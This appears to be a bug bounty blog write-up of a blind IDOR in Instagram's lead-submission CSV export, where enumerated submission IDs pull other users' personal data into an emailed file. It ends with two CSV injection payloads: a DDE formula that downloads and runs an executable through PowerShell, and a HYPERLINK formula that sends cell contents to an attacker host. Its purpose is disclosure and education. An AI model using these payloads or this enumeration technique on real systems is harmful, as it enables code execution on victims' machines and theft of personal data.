Blind Insecure Direct Object Reference (IDOR) Leads To Export Other User’s Data

Rafael Henrique/SOPA Images/LightRocket via Getty Images


The following write-up explains a vulnerability I found on Instagram. Due to an Instagram “Leads Submissions” flaw, I was able to export users’ data into a CSV file sent to my email. If you run a business Instagram account, you can collect information about your followers with a form/lead. For example, a store may want its followers to participate in a giveaway or apply for a job. The account owner may ask for User information (Full name, Email, Phone number, and Address) or any other information. Once the user submits the form, the Account owner will receive the results and there is an option to export the results into a CSV file.

The information shared here is intended for educational purposes. In this blog post, I want to share some tools and techniques that you may find useful when engaging with your application.

Technical Description:

There is a possibility that some endpoints that are susceptible to IDOR won’t report the leaked information directly. They might cause the application to leak information elsewhere instead, such as in export files, emails, or even text messages.

For every Instagram leads submission there is a unique id for example a user created a form and he received only 3 submissions [123123,321321,164376]. Those submissions can be exported into a CSV file by clicking on the “Mail Icon”.

Note the submission ID contains more than 6 digits. For purposes of example, I crafted a list of 6-digit numbers.

Send the exported results via email
Example of the exported records

Proof of Concept (PoC):

  1. Attacker generates a list of numbers for instance “crunch” tool can be used to create the wordlist.

Crunch is a wordlist generator where you can specify a standard character set or any set of characters to be used in generating the wordlists. The wordlists are created through the combination and permutation of a set of characters.

crunch <min> <max> characters -o OutPutFile.txt

A sample of the numbers generated  , Ctrl + A to select all
Ctrl + J to Join Lines
Replacing the spaces with comma “,”

2. Attacker request the CSV file.

3. Attacker inserts submissions IDs into lead_ids parameters separated by “,” The server can’t handle a Hugh request, but the attacker could split it by requesting multiple files with different submissions ids.

If the submission id exited on the database it will be added to the file containing user-filed information.

Time Line :

  • Reported July 26, 2022
  • Confirmed July 29, 2022
  • Fixed August 9, 2022
  • Rewarded August 9, 2022

I have also reported a CSV injection I was able to perform the following actions.

  • Hijacking Target machine -> =cmd|’/C powershell IEX(wget attackerserver/test.exe)’!A0
  • Exfiltrating contents from the spreadsheet when target Click on the link -> =HYPERLINK(“https://attacker.server?steal=”&D2&D3&D4&D5&C5,”More”)
Attacker server , data received
Meta team reply

Based on my research, I discovered that Meta is not interested in CSV injection vulnerabilities.

I’ll see you in the next blog, that’s all for today.